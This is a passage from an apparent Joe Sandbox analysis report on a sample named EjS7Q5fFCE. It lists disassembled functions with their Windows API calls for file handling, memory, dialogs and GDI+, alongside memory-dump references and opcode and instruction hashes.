                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: FjunC
                                                              • API String ID: 1269201914-662778638
                                                              • Opcode ID: cd02cf175b51a168fd2b6d2aa6f29daacd1bf472742759fb8ca9cf2a3695a12e
                                                              • Instruction ID: 286df3d719093ab3b87094417bb43b1054ee3d04efe9105f90827b3394b83210
                                                              • Opcode Fuzzy Hash: cd02cf175b51a168fd2b6d2aa6f29daacd1bf472742759fb8ca9cf2a3695a12e
                                                              • Instruction Fuzzy Hash: 73A012C155A101BC300821931C02C37010CC0C8B19730641FF801810C168480805083D
                                                              Function 0044BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0044B7BB: GetOEMCP.KERNEL32(00000000,?,?,0044BA44,?), ref: 0044B7E6
                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044BA89,?,00000000), ref: 0044BC64
                                                              • GetCPInfo.KERNEL32(00000000,0044BA89,?,?,?,0044BA89,?,00000000), ref: 0044BC77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: CodeInfoPageValid
                                                              • String ID:
                                                              • API String ID: 546120528-0
                                                              • Opcode ID: 0837f79f19ea17c7131ebb7427e29e3b60659d45c3085ea4dfd85edb730a7b21
                                                              • Instruction ID: 7e1f4ca7b095689c04ed21fddc9320ab050c45b425d687f9670b5483702b0b93
                                                              • Opcode Fuzzy Hash: 0837f79f19ea17c7131ebb7427e29e3b60659d45c3085ea4dfd85edb730a7b21
                                                              • Instruction Fuzzy Hash: F65133B0D002059EFB248F36C8816BBBBE4EF41304F1844AFD4968B252D73CDA469BD8
                                                              Function 00429A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00429A50,?,?,00000000,?,?,00428CBC,?), ref: 00429BAB
                                                              • GetLastError.KERNEL32(?,00000000,00428411,-00009570,00000000,000007F3), ref: 00429BB6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 6bf592597a0821fe31cc0574a2b910c285530050fe4ee693ff4360a67415e59d
                                                              • Instruction ID: daf6935b69d07449eb0a618d82f63b5078cd2b79fb8c2edca176f0e1346cca3b
                                                              • Opcode Fuzzy Hash: 6bf592597a0821fe31cc0574a2b910c285530050fe4ee693ff4360a67415e59d
                                                              • Instruction Fuzzy Hash: 4D41BA30B043618BDB24DF25F58446BBBE5FFD5321F548A2EE88183361D778BC058A99
                                                              Function 00421E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00421E55
                                                                • Part of subcall function 00423BBA: __EH_prolog.LIBCMT ref: 00423BBF
                                                              • _wcslen.LIBCMT ref: 00421EFD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog$_wcslen
                                                              • String ID:
                                                              • API String ID: 2838827086-0
                                                              • Opcode ID: 6437b99e1135f550b4182afe0ef2eef5547d9244c81d3b61ccfa64c625d7b2bd
                                                              • Instruction ID: 1ad9d1b4f2bedaa81b5fc638f21581da8dd46b9ec93be8fd54dbecde5f6681f4
                                                              • Opcode Fuzzy Hash: 6437b99e1135f550b4182afe0ef2eef5547d9244c81d3b61ccfa64c625d7b2bd
                                                              • Instruction Fuzzy Hash: 6B314C71A041199FCF15EF99D945ADEFBF5AF58304F60006EE845A7261C73A5E00CB68
                                                              Function 00429DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004273BC,?,?,?,00000000), ref: 00429DBC
                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00429E70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: File$BuffersFlushTime
                                                              • String ID:
                                                              • API String ID: 1392018926-0
                                                              • Opcode ID: 3b9a6b4528fa73611f9176fcc977246c2cb19f1da2bbebb4e7564c3b363d56d4
                                                              • Instruction ID: 4c6b27f8f090a1086ca5a7912cb6f97165e4fcf0002177d298fab9e1d7722f70
                                                              • Opcode Fuzzy Hash: 3b9a6b4528fa73611f9176fcc977246c2cb19f1da2bbebb4e7564c3b363d56d4
                                                              • Instruction Fuzzy Hash: B621EE31358356ABC714CF25D891AABBBE4AF55704F48481EF8C583681D32DED0C9B66
                                                              Function 0042966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00429F27,?,?,0042771A), ref: 004296E6
                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00429F27,?,?,0042771A), ref: 00429716
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: bd8479f2199c5a3da3b050f4955fd389e2fa5d9954ab2a7e0bfb160637bd8af0
                                                              • Instruction ID: 645db117780e066cce02f63cdca9959750d225c6beadaa57fbcaa0f5274bc5cf
                                                              • Opcode Fuzzy Hash: bd8479f2199c5a3da3b050f4955fd389e2fa5d9954ab2a7e0bfb160637bd8af0
                                                              • Instruction Fuzzy Hash: 7821F171204354AFE3308A65DC89FA777DCEB49325F800A2EF9D5C26C1C778AC848635
                                                              Function 00429E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00429EC7
                                                              • GetLastError.KERNEL32 ref: 00429ED4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 97e4848949969db3a95a3a6a2e40761c2d418359ccc1aae8388d25e7cbbcc902
                                                              • Instruction ID: 60a83f69784e54fc7292f45633c3cf15b08e98295b827fe175533e4250e855d1
                                                              • Opcode Fuzzy Hash: 97e4848949969db3a95a3a6a2e40761c2d418359ccc1aae8388d25e7cbbcc902
                                                              • Instruction Fuzzy Hash: F7112530700320ABD724CA28D840BA7B3E9AB04371F914A2BE152D26E0E3B8ED45C768
                                                              Function 00448E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00448E75
                                                                • Part of subcall function 00448E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0044CA2C,00000000,?,00446CBE,?,00000008,?,004491E0,?,?,?), ref: 00448E38
                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00461098,004217CE,?,?,00000007,?,?,?,004213D6,?,00000000), ref: 00448EB1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocAllocate_free
                                                              • String ID:
                                                              • API String ID: 2447670028-0
                                                              • Opcode ID: 44d16d746f3ac10c6bb2760d8f94291b3442d4da3cfaba498e39172f6d5e5dad
                                                              • Instruction ID: 2349335ece3ecbd38627e19d4348b0150518b27b5ca92f4d9fc0e168dbf0c6ec
                                                              • Opcode Fuzzy Hash: 44d16d746f3ac10c6bb2760d8f94291b3442d4da3cfaba498e39172f6d5e5dad
                                                              • Instruction Fuzzy Hash: 5EF0623260161566FB216A669C05B6F37588F91B70F34412FF814E7291DF6CDD0191AD
                                                              Function 0043109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 004310AB
                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 004310B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Process$AffinityCurrentMask
                                                              • String ID:
                                                              • API String ID: 1231390398-0
                                                              • Opcode ID: dd7a20fbc498ea15930a4fb8eae05677e33f139569367912466320fe66971f55
                                                              • Instruction ID: 7be212562820072e4906fa0d4d82e4f15e7d983c6a6592da7684ae62b4e30e63
                                                              • Opcode Fuzzy Hash: dd7a20fbc498ea15930a4fb8eae05677e33f139569367912466320fe66971f55
                                                              • Instruction Fuzzy Hash: D5E0D832B01289A7CF0D8BB49C058EB73FDEA48345B10A176E403E7655F938DE414A64
                                                              Function 0042A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0042A325,?,?,?,0042A175,?,00000001,00000000,?,?), ref: 0042A501
                                                                • Part of subcall function 0042BB03: _wcslen.LIBCMT ref: 0042BB27
                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0042A325,?,?,?,0042A175,?,00000001,00000000,?,?), ref: 0042A532
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2673547680-0
                                                              • Opcode ID: 80a681d06a54f64d9a8d63cda6fab614372749dd51fc21eae6d07e18ca495068
                                                              • Instruction ID: c386ad17da136a87e757e3760152184973f3fa65842f2bc6e7f93783741e1768
                                                              • Opcode Fuzzy Hash: 80a681d06a54f64d9a8d63cda6fab614372749dd51fc21eae6d07e18ca495068
                                                              • Instruction Fuzzy Hash: 79F0A0312003197BDF025F61EC01FDA376CAB04786F848062BC44D51A0DB35DAD4DA54
                                                              Function 0042A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteFileW.KERNELBASE(000000FF,?,?,0042977F,?,?,004295CF,?,?,?,?,?,00452641,000000FF), ref: 0042A1F1
                                                                • Part of subcall function 0042BB03: _wcslen.LIBCMT ref: 0042BB27
                                                              • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0042977F,?,?,004295CF,?,?,?,?,?,00452641), ref: 0042A21F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: DeleteFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2643169976-0
                                                              • Opcode ID: 702dad2c748105d681475af7b21a8b110035b233983998eca75c8c2832acc155
                                                              • Instruction ID: 2f79ef0301842262ea72827981a5a2498914b174f97a3358ea1531bf20c707a4
                                                              • Opcode Fuzzy Hash: 702dad2c748105d681475af7b21a8b110035b233983998eca75c8c2832acc155
                                                              • Instruction Fuzzy Hash: ECE02231200318ABEB019F21EC01FDE375CAB0C7CAF884062B804D2190EB25DE94DA68
                                                              Function 0043AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00452641,000000FF), ref: 0043ACB0
                                                              • CoUninitialize.COMBASE(?,?,?,?,00452641,000000FF), ref: 0043ACB5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: GdiplusShutdownUninitialize
                                                              • String ID:
                                                              • API String ID: 3856339756-0
                                                              • Opcode ID: c903c960297925f6d140d429e8955855cdab56d56e99db30cd48c977c6e29ff5
                                                              • Instruction ID: d080fc0d770807f59312c65ffe1b814f97be8b4453972207a25d407c96fc7455
                                                              • Opcode Fuzzy Hash: c903c960297925f6d140d429e8955855cdab56d56e99db30cd48c977c6e29ff5
                                                              • Instruction Fuzzy Hash: 8CE03072544A50EBC6019F59DC46B49FBA8FB48A21F10426AF416D36A1CB74A800CA98
                                                              Function 0042A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,?,?,0042A23A,?,0042755C,?,?,?,?), ref: 0042A254
                                                                • Part of subcall function 0042BB03: _wcslen.LIBCMT ref: 0042BB27
                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0042A23A,?,0042755C,?,?,?,?), ref: 0042A280
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2673547680-0
                                                              • Opcode ID: 9ebeff21be16f7a8b66ea5ac8e78da1969f8f4732bef79e05a952df2fa1b78a9
                                                              • Instruction ID: fe92ae8de56cff3df9640f6b1d51596a8bb23a3c718187111eb1919583478909
                                                              • Opcode Fuzzy Hash: 9ebeff21be16f7a8b66ea5ac8e78da1969f8f4732bef79e05a952df2fa1b78a9
                                                              • Instruction Fuzzy Hash: B0E092316002249BCB10AB65DC05BD97B58AB097E6F4442B2FD44E32D5D774DE44CAF9
                                                              Function 0043DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 0043DEEC
                                                                • Part of subcall function 00424092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004240A5
                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 0043DF03
                                                                • Part of subcall function 0043B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0043B579
                                                                • Part of subcall function 0043B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0043B58A
                                                                • Part of subcall function 0043B568: IsDialogMessageW.USER32(00010484,?), ref: 0043B59E
                                                                • Part of subcall function 0043B568: TranslateMessage.USER32(?), ref: 0043B5AC
                                                                • Part of subcall function 0043B568: DispatchMessageW.USER32(?), ref: 0043B5B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                              • String ID:
                                                              • API String ID: 2718869927-0
                                                              • Opcode ID: 6b37ea5cb58f5dea004f5a0196b07a2ca85411bae2ee2f9d6b6784673efada36
                                                              • Instruction ID: 6a8496181704003083ab56ff6de27eb0ae4440e92d67d9d2a886bd3defe115fb
                                                              • Opcode Fuzzy Hash: 6b37ea5cb58f5dea004f5a0196b07a2ca85411bae2ee2f9d6b6784673efada36
                                                              • Instruction Fuzzy Hash: DAE09B7150025826DF01AB62DC06F9E376C9B097C9F44086AB300DB0E2E97DDA50876A
                                                              Function 0043081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00430836
                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0042F2D8,Crypt32.dll,00000000,0042F35C,?,?,0042F33E,?,?,?), ref: 00430858
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystem
                                                              • String ID:
                                                              • API String ID: 1175261203-0
                                                              • Opcode ID: d3776bc8526c1273e75f65e5c01c074c6cf3edc82e76398f02c2dedfd8a92198
                                                              • Instruction ID: f98fb8804bb52c724b40fc343cd3d85455d874e60a3238c9f1ecef20a7339899
                                                              • Opcode Fuzzy Hash: d3776bc8526c1273e75f65e5c01c074c6cf3edc82e76398f02c2dedfd8a92198
                                                              • Instruction Fuzzy Hash: F1E012765002286BDB11AB959C05FDA77ACEF0D7D2F040066B645D2145D678DA84CAA8
                                                              Function 0043A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0043A3DA
                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0043A3E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
